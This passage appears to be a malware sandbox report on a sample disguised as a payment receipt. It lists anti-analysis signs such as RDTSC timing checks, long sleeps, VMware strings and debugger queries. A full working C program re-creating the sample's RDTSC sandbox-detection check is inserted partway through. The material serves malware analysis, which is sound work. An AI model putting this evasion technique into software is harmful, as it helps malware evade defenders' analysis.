Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_00409A90 rdtsc
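The RDTSC entries above record the classic two-reads-in-a-row timing check: the sample executes rdtsc, does nothing but register arithmetic, and executes rdtsc again, so the difference between the two reads is the raw cost of the instruction pair. The C program below is an added example written for this page, not code from the sample or from the sandbox. It re-creates that pair, takes the minimum delta over many samples (interrupts and context switches can only make a sample slower, so the minimum is the cleanest estimate), and keeps the decision separate from the measurement so the threshold logic can be exercised with constructed values. The 64-sample count and the 3000-cycle threshold are assumptions chosen for the demonstration, not values recovered from the sample.

```c
/* Added example (not code from the analysed sample or from the sandbox):
 * the back-to-back RDTSC check described by the report's interceptor entries
 * (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc), reimplemented in C.
 * Sample count (64) and threshold (3000 cycles) are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <time.h>

#if defined(__x86_64__) || defined(__i386__)
/* Read the time-stamp counter exactly as the sample does. */
static uint64_t read_tsc(void) {
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
}
#else
/* Non-x86 fallback so the example still builds elsewhere: CPU clock ticks. */
static uint64_t read_tsc(void) {
    return (uint64_t)clock();
}
#endif

/* One measurement: two consecutive reads with only register arithmetic in
 * between. The sample zeroes ecx and adds eax; here the compiler-generated
 * subtraction plays the same role. */
static uint64_t rdtsc_pair_delta(void) {
    uint64_t t0 = read_tsc();
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

/* Minimum delta over `samples` measurements. Returns UINT64_MAX when asked
 * for zero samples, so callers can tell "no data" from a real value. */
uint64_t min_rdtsc_delta(int samples) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < samples; i++) {
        uint64_t d = rdtsc_pair_delta();
        if (d < best) best = d;
    }
    return best;
}

/* Decision logic kept apart from measurement so it can be tested with
 * constructed deltas. A hypervisor or sandbox that traps RDTSC, or a
 * single-stepping debugger, turns a few dozen cycles into thousands.
 * Returns 1 for "looks instrumented", 0 otherwise. */
int classify_delta(uint64_t delta, uint64_t threshold) {
    return delta > threshold ? 1 : 0;
}

int main(void) {
    const uint64_t threshold = 3000; /* assumed; calibrate per CPU */
    uint64_t d = min_rdtsc_delta(64);
    printf("min rdtsc delta over 64 samples: %llu -> %s\n",
           (unsigned long long)d,
           classify_delta(d, threshold) ? "instrumented?"
                                        : "bare metal or non-trapping VM");
    return 0;
}
```

Two caveats a practitioner should keep in mind. First, VMware, Hyper-V and KVM expose RDTSC to the guest natively by default (with TSC offsetting), so on a stock VM the delta is indistinguishable from bare metal; the check mainly catches emulators, single-stepping debuggers and sandboxes that trap or hook the instruction. Second, a sandbox that does intercept RDTSC can return plausibly small increments, which is what the "RDTSC instruction interceptor" entries above indicate this environment did; the reported check is therefore evidence of intent, not evidence that the sample concluded it was being analysed.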
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 5772; Thread sleep time: -52501 ms >= -30000 ms
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 6088; Thread sleep time: -922337203685477 ms >= -30000 ms
Source: C:\Windows\explorer.exe TID: 4568; Thread sleep count: 39 > 30
Source: C:\Windows\explorer.exe TID: 4568; Thread sleep time: -78000 ms >= -30000 ms
Source: C:\Windows\SysWOW64\wlanext.exe TID: 5456; Thread sleep time: -75000 ms >= -30000 ms
Source: C:\Windows\explorer.exe; Last function: Thread delayed (2 occurrences)
Source: explorer.exe, 00000002.00000000.246034971.000000000891C000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD00dRom0
Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp; Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.236884381.0000000003710000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp; Binary or memory string: vmware
Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp; Binary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
Source: explorer.exe, 00000002.00000002.494413702.0000000003767000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.241386939.00000000053A0000.00000004.00000001.sdmp; Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F4
Source: explorer.exe, 00000002.00000002.490839971.00000000011B3000.00000004.00000020.sdmp; Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000002.00000002.499236558.00000000053A0000.00000004.00000001.sdmp; Binary or memory string: AF_UNIXa0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000002.499263196.00000000053C4000.00000004.00000001.sdmp; Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmp; Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp; Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\wlanext.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_00409A90 rdtsc
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_0040ACD0 LdrLoadDll
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013E513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h] (4 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013BB171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013BC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013DB944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h] (8 occurrences); mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013E61A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_014441E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013E2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013E4190 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013EA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013DC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_014369A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_014351BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Code function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h] (2 occurrences)